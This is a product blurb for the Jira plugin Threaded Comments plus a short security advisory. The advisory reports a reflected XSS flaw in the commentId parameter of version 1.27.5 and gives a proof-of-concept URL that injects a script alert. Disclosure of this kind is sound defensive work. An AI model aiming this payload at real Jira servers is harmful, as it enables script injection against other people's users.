Threaded Comments

Jira default comments are pretty basic. Have you ever wished for more functionality?

Threaded Comments adds these useful features to make your comments easier and more informative:

  • Facebook-like thread conversation experience - make comments more friendly and readable

  • Reply button - directly respond to a comment

  • Like/dislike button - acknowledge with one-click

  • List of people who like/dislike - see who are on your side (wink)

  • Project-based configurations - it’s your call to select which project you want to enable the plugin

Security Report - Threaded Comments for Jira - Ver 1.27.5
A XSS vulnerability was found in Threaded Comments for Jira - Version 1.27.5, that allows remote attackers to inject arbitrary HTML or JavaScript. 

Vulnerable Url: 

https://secure.server.com/plugins/servlet/threaded-comments/helper?commentId=12345%22%3E%3Cscript%3Ealert(/xss/)%3C/script%3E 

Description: 

A XSS vulnerability was found in Threaded Comments for Jira - Version 1.27.5 

This allows remote attackers to inject arbitrary HTML or JavaScript. 

Threaded Comments API : /plugins/servlet/threaded-comments/helper 

Vulnerability param: commentId 

POC: https://secure.server.com/plugins/servlet/threaded-comments/helper?commentId=12345%22%3E%3Cscript%3Ealert(/xss/)%3C/script%3E

pastedGraphic.png

Recommendation:-

Upgrade to latest version of Threaded Comments:-

Version 1.33.0 for Jira Server and Jira Data Center 8.0.0 - 8.18.2

Released:- Aug 9th, 2021

Document date:- 14th September 2021